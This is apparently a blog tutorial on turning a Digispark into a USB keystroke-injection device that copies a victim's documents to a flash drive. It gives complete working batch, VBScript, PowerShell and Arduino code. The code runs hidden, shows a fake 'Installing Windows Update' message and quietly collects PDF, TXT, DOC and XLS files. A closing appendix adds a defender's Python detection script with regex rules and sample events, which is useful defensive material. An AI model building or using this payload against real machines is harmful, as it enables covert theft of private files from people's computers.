Exfiltrating files with Digispark


Introduction

Some time ago I wrote a tutorial titled “1$ USB Rubber Ducky alternative”. This one is more or less a continuation of it.
In this tutorial I’m going to show you how you can use a Digispark and a regular flash drive to back up files from computers to the flash drive.
For the purpose of this tutorial I will not go through setting up the Digispark dev environment; for that, take a look at 1$ USB Rubber Ducky alternative.

What you’ll need

  • Digispark
  • Arduino software
  • USB drive
  • (Optional) USB hub

Setting up the flashdrive

  1. Rename your flash drive to something unique. I named mine PK because it’s a shortened version of “pika”. (You’ll be using the name of the flash drive as a way to find where you want to put your files.)
  2. Create a couple of files on the flash drive:
  • d.cmd (Blinks the CAPSLOCK LED when started, executes i.vbs):
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0\i.vbs %~d0\e.cmd
@exit
  • e.cmd (Copies files, blinks the CAPSLOCK LED when done):
@echo off
@echo Installing Windows Update

REM Creates a directory named from the computer name, date and time
REM %~d0 = drive letter of this batch file. %COMPUTERNAME%, %date% and %time% are pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /S Copies directories and subdirectories, except empty ones.

REM Documents
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.txt %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xls %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
  • i.vbs (Executes e.cmd invisibly):
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Setting up the Digispark

Just flash this code to your Digispark, replacing the PK on line 23 with the name of your flash drive.

#include "DigiKeyboard.h"

void setup() {
// don't need to set anything up to use DigiKeyboard
}

void loop() {
// this is generally not necessary but with some older systems it seems to
// prevent missing the first character after a delay:
DigiKeyboard.sendKeyStroke(0);

// Open cmd
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print("cmd");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);

// Find the volume labelled PK and run d.cmd from it
DigiKeyboard.print("powershell \".((gwmi win32_volume -f 'label=''PK''').Name+'d.cmd')\"");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
while(true){
  //do nothing
}
}

Final notes

Congratulations, you’re done!
You could use a cheap USB hub so that the whole setup takes up only one port.
The current payload will only take pdf, txt, doc and xlsx files, but you can modify the e.cmd file to add your own extensions. Just keep in mind that the more extensions you add, the more time the payload will need to finish its job.
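
The same chain seen from the defender's side, as an added example that is not part of the original post: process-creation command lines (for instance Sysmon event ID 1, or Windows event 4688 with command-line auditing) are matched against the four distinctive commands above and correlated per host. The rule names, the sample events and the assumption that C: is the system drive are constructed for illustration.

```python
import re
from collections import defaultdict

# Assumption: C: is the system drive; any other drive letter is treated as removable.
RULES = {
    "volume_label_launch": re.compile(
        r"win32_volume.*label=.*\.(cmd|bat|vbs|ps1)", re.I),
    "script_host_off_system_drive": re.compile(
        r"\b[cw]script(\.exe)?\"?\s+\"?(?!c:)[a-z]:\\\S*\.vbs", re.I),
    "xcopy_profile_to_other_drive": re.compile(
        r"\bxcopy(\.exe)?\"?\s.*c:\\users\\\S+\s+\"?(?!c:)[a-z]:\\", re.I),
    "hidden_powershell_sendkeys": re.compile(
        r"powershell.*-windowstyle\s+hidden.*sendkeys", re.I),
}

def match_rules(cmdline):
    """Return the names of all rules a single command line triggers."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def find_chains(events, window=60, min_rules=2):
    """Report hosts where >= min_rules distinct rules fire within `window` seconds."""
    hits = defaultdict(list)
    for ts, host, cmdline in events:
        for name in match_rules(cmdline):
            hits[host].append((ts, name))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            names = {n for t, n in seen[i:] if t - start <= window}
            if len(names) >= min_rules:
                alerts[host] = sorted(names)
                break
    return alerts

# Constructed sample events: (epoch seconds, host, process command line)
SAMPLE = [
    (100, "WS01", "powershell  \".((gwmi win32_volume -f 'label=''PK''').Name+'d.cmd')\""),
    (101, "WS01", r"powershell.exe -nologo -WindowStyle Hidden -sta -command $wsh.SendKeys('{CAPSLOCK}')"),
    (102, "WS01", r"cscript  E:\i.vbs E:\e.cmd"),
    (103, "WS01", r"xcopy  /C /Q /G /Y /S C:\Users\alice\Documents\*.pdf E:\slurp\WS01_20240102_101500"),
    (200, "WS02", r"cscript C:\Windows\System32\slmgr.vbs /dli"),
    (210, "WS02", r"xcopy /E C:\build\out C:\deploy"),
    (300, "WS03", r"xcopy /S C:\Users\bob\Documents D:\backup"),
]

if __name__ == "__main__":
    for host, names in find_chains(SAMPLE).items():
        print(host, names)
```

A single xcopy to another drive (WS03) looks like an ordinary backup and is not reported on its own; it is the combination of rules within a short window that marks the chain.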
